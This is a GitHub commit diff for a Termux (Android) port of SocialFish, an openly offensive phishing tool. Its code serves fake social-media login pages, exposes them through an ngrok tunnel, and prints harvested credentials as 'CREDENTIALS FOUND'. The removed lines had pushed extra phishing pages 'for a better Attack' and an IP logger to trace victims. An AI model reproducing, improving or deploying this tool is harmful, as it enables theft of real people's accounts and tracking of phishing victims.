SocialFish for Termux in Android.

Finally all new SocialFish For Termux is Now available .
Now enjoy Social fish in Your Android Devices.

THANK YOU
This commit is contained in:
An0nUD4Y 2018-03-31 18:57:41 +05:30 committed by GitHub
parent 58f8c702aa
commit ca8ed268fd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -3,13 +3,14 @@
# SOCIALFISH v2.0
# by: An0nUD4Y
#
###########################
# TERMUX VERSION OF SOCIALFISH
###############################
from time import sleep
from sys import stdout, exit
from os import system, path
import multiprocessing
from urllib import urlopen
from platform import system as systemos, architecture
from platform import architecture
from wget import download
RED, WHITE, CYAN, GREEN, END = '\033[91m', '\33[46m', '\033[36m', '\033[1;32m', '\033[0m'
@ -27,6 +28,7 @@ if connected() == False:
\o__ /\| ___] |__| |___ | | | |___ | | ___] | |
\|
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
{0}[{1}!{0}]{1} By--------------> An0nUD4Y \n
'''.format(RED, END)
exit(0)
@ -55,12 +57,9 @@ def end():
| / / / / / / / / |__\ < {1}FORGET{2} )
|/ / / / / / / / \_ {1}ME !{2} _)
{1}F I S H{2} ~--___--~
{0}This script was made by UndeadSec_ But I have added some more features in it ]
{1}[ {0} Some more phising pages have been added in script. For a better Attack]
[ {0} Work Done By------------------------> An0nUD4Y]\n'''.format(GREEN, END, CYAN)
[ {0} Work Done By------------------------> An0nUD4Y]\n'''.format(RED, END, CYAN)
def loadModule(module):
print '''{0}
@ -70,7 +69,7 @@ def loadModule(module):
`=.____.=" `._\\
[{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, END) % module
[{1}*{0}]{1} %s module loaded.{0}'''.format(CYAN, END) % module
def runPhishing(social, option2):
system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt')
@ -109,19 +108,16 @@ def waitCreds():
.' "-.,' /
( AnonUD4Y_ ~.<
`=.____.=" `._\\
[{1}*{0}]{1} Do you need more help to make your ngrok link more trusted.
[{1}*{0}]{1} Just visit to [https://iplogger.org]
[{1}*{0}]{1} This will help you to trace your victims by their ip address on real time.
[{1}*{0}]{1} And make your ngrok link more trusted type.{0}'''.format(CYAN, END)
print " {0}[{1}*{0}]{1} Waiting for credentials... \n".format(RED, END)
print " {0}[{1}*{0}]{1} Waiting for credentials... \n".format(GREEN, END)
while True:
with open('Server/www/usernames.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
print ' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines
print ' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(RED, END) % lines
system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
creds.close()
@ -143,6 +139,7 @@ def runPEnv():
' . . . . . '. .' ' .
' ' '. ' {1}Updated_By--> AnonUD4Y_{2}
' ' '
' ' {1}https://github.com/An0nUD4Y{2}
' . '
'
{1}'''.format(GREEN, END, CYAN)
@ -203,7 +200,7 @@ def runNgrok():
sleep(10)
system('curl -s http://127.0.0.1:4040/status | grep -P "https://.*?ngrok.io" -oh > ngrok.url')
url = open('ngrok.url', 'r')
print('\n {0}[{1}*{0}]{1} Ngrok URL: {2}' + url.readlines()[0] + '{1}').format(RED, END, CYAN)
print('\n {0}[{1}*{0}]{1} Ngrok URL: {2}' + url.read() + '{1}').format(CYAN, END, GREEN)
url.close()
def runServer():